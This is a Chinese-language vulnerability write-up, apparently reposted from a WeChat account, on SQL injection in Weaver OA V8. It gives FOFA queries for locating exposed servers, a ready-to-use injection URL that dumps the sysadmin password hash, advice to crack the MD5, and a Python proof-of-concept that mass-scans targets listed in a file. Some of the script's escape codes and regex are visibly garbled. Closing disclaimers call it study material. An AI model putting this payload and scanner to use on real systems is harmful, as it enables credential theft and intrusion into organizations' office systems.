一漏洞背景
泛微OA V8 是一款功能强大的泛微协同办公系统标准版程序,其可为用户提供一个协同、集成的办公环境,并且能使所有的办公人员都在统一且个性化的信息门户中一起工作,摆脱时间和地域的限制,实现协同工作与知识管理。
泛微OA V8 具有SQL注入漏洞,可以通过漏洞获取到管理员的密码
二、漏洞复现
祭出fofa大法,fofa语法如下
app="Weaver-OA"
app="泛微-协同办公OA"
随意来一个
Burp构造请求参数 完成数据库操作
/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager
查询HrmResourceManager表中的password,页面中返回了数据库第一条记录的值(sysadmin用户的password)
得到md5拿去解密
顺便加入以下goby里面去
附赠poc 大家可以自己写简单 没写保存。自己动手丰衣足食哈各位 也可以用>>name.txt
import requests
import sys
import re
import urllib3
from requests.packages.urllib3.exceptions import InsecureRequestWarning
a=[]
def title():
print('�33[34m+------------------------------------------�33[0m')
print('+ �33[31m版本: 泛微OA V8 SQL注入漏洞复现 4-8号 �33[0m')
print('+ �33[31m公众号:深夜笔记本 �33[0m')
print('+ �33[31m使用格式: python3 poc.py �33[0m')
print('�33[34m------------------------------------------ �33[0m')
def POC_1(target_url):
core_url = target_url + "/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%20id%20from%20HrmResourceManager" #poc
try:
response = requests.request("GET", url=core_url, timeout=2)
if response.status_code == 200: # 返回200
print("�33[32m[o] 存在利用漏洞 �33[0m",core_url)
except:
print("�33[31m[x] 不存在利用漏洞�33[0m")
return 1
if __name__ == '__main__':
title()
with open('url.txt', 'r', encoding='utf-8') as f:
g=f.read()
a=re.findall('d{1,3}[.]d{1,3}[.]d{1,3}[.]d{1,3}[:]d+',g)
for i in a:
if 'http' in i:
target_url = str(i)
else:
target_url = 'http://'+str(i)
POC_1(target_url)
特别声明:
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。
作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考
原文始发于微信公众号(深夜笔记本):热议-泛微OA V8 SQL注入漏洞复现 4-8号
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论